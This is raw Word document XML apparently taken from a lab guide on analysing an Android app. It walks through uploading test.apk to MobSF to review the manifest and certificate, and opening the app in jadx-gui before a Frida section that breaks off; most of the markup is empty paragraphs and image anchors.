                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067175" cy="3689350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B29A6" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0DB99003" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="22D67A3D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="191C4403" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6C69F65D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="381D2E5E" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5288AB3B" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="601DE387" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6571106F" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="66D1B5E1" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="01E66F60" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="66AE2388" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3651B2B0" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0DC88DFB" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="089AF88E" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00E05F75" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="75AE9DDD" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="46EB0FBC" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="42C7813A" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7AB5776B" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1EB32C8C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5AC0C742" w14:textId="4F855085" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Get a test.apk file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A904FF" w14:textId="486EEF88" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00D657D0" w:rsidP="00F900B0">
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="026B6F76" wp14:editId="083946C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5724939" cy="1975593"/>
            <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="799398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398524" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724939" cy="1975593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F317231" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="06F6AD8D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="406CB557" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2575B083" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2F014644" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="00A09801" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4DD8D138" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="37A141A1" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2ED87C35" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2299BB31" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5EF16CC7" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6EE6F278" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2CF0E02E" w14:textId="05F41453" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="003BFFCD" wp14:editId="683E34A1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>317693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4904002" cy="3745065"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="267730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730749" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4904002" cy="3745065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Upload test.apk file to MobSF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4FE7B" w14:textId="7187E89F" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="19339040" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6A319960" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0BD5E593" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="27D4E8E2" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2DF6ED96" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="750551E8" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="682416E2" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4B8EC1A1" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3EA71C0C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2BEBDB0B" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="35D242F1" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="777CC7BE" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0AE5AC79" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7E8EDAD7" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2DA8F696" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="541BF62A" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="047660D5" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1DABA020" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00E05F75" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="123EF0F1" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="13AE0D05" w14:textId="71BD42A8" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="17362687" w14:textId="197C08D1" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00E5073A" w:rsidP="00F900B0">
      <w:r w:rsidRPr="00386175">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2884C2F3" wp14:editId="0B2F82D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="1888914"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1861259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59030" name=""/>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732890" cy="1888914"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370B4E1" w14:textId="59A7E7FF" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="65D7D92D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="24B39174" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00386175" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="17DFDD85" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00386175" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0241EAA5" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00386175" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="35D37FAD" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00386175" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0DD5F17C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00386175" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="639DE029" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3AAD74FD" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2B6DDD8F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="30D99403" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2610017F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4F1626C6" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="16832428" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1E7A2EF2" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="38089DBF" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1D2DAF3D" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="661249BC" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2F7E9CF3" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="742D7A5C" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3D8565FF" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1FDA5844" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1678F67B" w14:textId="296E38DA" w:rsidR="00F900B0" w:rsidRDefault="00E5073A" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00103959">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CF4E516" wp14:editId="25FA377D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5697938" cy="2427712"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="10795"/>
            <wp:wrapNone/>
            <wp:docPr id="488553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553162" name=""/>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697938" cy="2427712"/>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F900B0">
        <w:t>Look for Manifest analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399494FD" w14:textId="44591B04" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1424929E" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00103959" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5A196FAB" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00103959" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1CDDDCC6" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00103959" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="066B4FC1" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00103959" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5DDF5EF3" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1566AC28" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="26A616D9" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="165F1E0D" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4BED0383" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1EADE9CC" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00103959" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5D4A8730" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00103959" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0F312065" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6AB48201" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="29EC4CDC" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="694D6E5C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Look for Certificate analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8FA27A" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:r w:rsidRPr="00240426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C5C3E77" wp14:editId="62710C85">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>49530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5697855" cy="817545"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="20955"/>
            <wp:wrapNone/>
            <wp:docPr id="657143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143951" name=""/>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697855" cy="81754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5359011B" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00240426" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="188C3A09" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="569B1AD9" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1761DDC9" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="20863187" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5726C2C9" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="050B8273" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="259818B2" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="56F830DD" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0A778413" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2612950F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="31ED3738" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="746C1FDB" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="730EFD75" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="211E56BC" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3B818D72" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="762A43D4" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="13D84926" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="68FE5559" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7844FE57" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2F77E60B" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="76F8220B" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="156485ED" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6501B221" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="717B7813" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="23F22D0F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1CB76C39" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C3032">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dynamic Analysis using Frida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF7D08" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="000419C3" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD18B0">
        <w:t>Identify Target Function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by entering the below command in Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C69D5" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000419C3">
        <w:t>jadx-gui test.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4E69F" w14:textId="702A006A" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:r w:rsidRPr="00A60B9C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
